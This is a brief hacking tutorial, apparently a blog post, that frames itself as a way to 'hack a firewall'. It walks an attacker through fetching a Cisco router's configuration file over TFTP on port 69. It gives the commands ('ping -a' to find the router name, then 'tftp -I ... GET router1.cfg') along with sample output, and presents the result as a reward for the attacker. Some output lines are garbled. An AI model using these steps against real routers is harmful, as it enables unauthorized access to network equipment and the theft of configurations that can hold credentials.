By-Pass Firewalls

How can you hack a Firewall? Well, there is a useful tool called Trivial FTP (TFTP) which can be used by a attacker to hack firewalls. How does it work? While scanning UDP ports, you will want to pay close attention to systems with port 69 open. Cicso routers allow the use of TFTP in conjunction with network servers to read and write configuration files. The configuration files are updated whenever a router configuration is changed. If you can identify TFTP, there is a good chance that you can access the configuration file and download it. Here are the basic steps:- (1) Determine the router’s name. NSLookup or Ping –a can be useful. c: \>ping -a 192.168.13.1 Pinging Router1 [192.168.13.1] with 32 bytes of data: Reply from 192.168.13.1: bytes=32 time<10ms ttl="255
Reply from 192.168.13.1: bytes=32 time<10ms ttl="255
Reply from 192.168.13.1: bytes=32 time<10ms ttl="255
Reply from 192.168.13.1: bytes=32 time<10ms ttl="255
Ping statistics for 192.168.13.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
(2) After the router’s name is known, you can then use TFTP to download it from the TFTP server.
c:\>tftp -I 192.168.13.1 GET router1.cfg
Transfer successful: 250 bytes in 1 second, 250 bytes/s
(3) If you are lucky, you will be rewarded with the router’s configuration file.

0 comments: